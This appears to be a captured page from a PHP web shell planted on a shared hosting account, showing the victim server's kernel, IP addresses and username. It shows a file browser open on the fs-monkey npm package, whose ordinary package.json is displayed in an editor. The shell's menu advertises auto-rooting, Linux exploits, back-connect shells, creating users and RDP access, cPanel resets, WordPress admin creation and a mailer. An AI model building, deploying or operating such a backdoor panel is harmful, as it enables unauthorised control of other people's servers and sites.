Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
fs-monkey /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
1.11
KB
-rw-r--r--
LICENSE
1.18
KB
-rw-r--r--
README.md
1.1
KB
-rw-r--r--
package.json
1.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "fs-monkey", "version": "1.0.3", "description": "Monkey patches for file system related things.", "main": "lib/index.js", "license": "Unlicense", "keywords": [ "fs", "file", "file system", "monkey", "fsmonkey", "monkeyfs", "monkeypatch", "patch" ], "files": [ "lib", "!lib/__tests__", "docs" ], "directories": { "doc": "docs" }, "repository": { "type": "git", "url": "https://github.com/streamich/fs-monkey.git" }, "scripts": { "build": "babel src --out-dir lib", "test": "jest" }, "dependencies": {}, "devDependencies": { "@babel/cli": "^7.13.14", "@babel/core": "^7.13.14", "@babel/preset-env": "^7.13.12", "@semantic-release/changelog": "5.0.1", "@semantic-release/git": "9.0.0", "@semantic-release/npm": "7.1.0", "@types/jest": "26.0.22", "@types/node": "8.10.66", "babel-jest": "26.6.3", "jest": "26.6.3", "semantic-release": "17.4.2", "source-map-support": "0.5.19" }, "release": { "verifyConditions": [ "@semantic-release/changelog", "@semantic-release/npm", "@semantic-release/git" ], "prepare": [ "@semantic-release/changelog", "@semantic-release/npm", "@semantic-release/git" ] }, "jest": { "collectCoverageFrom": [ "src/**/*.js" ], "transform": { "^.+\\.jsx?$": "babel-jest" }, "testRegex": ".*(__tests__/|/test/unit/).*(test|spec)\\.(t|j)sx?$" } }
Close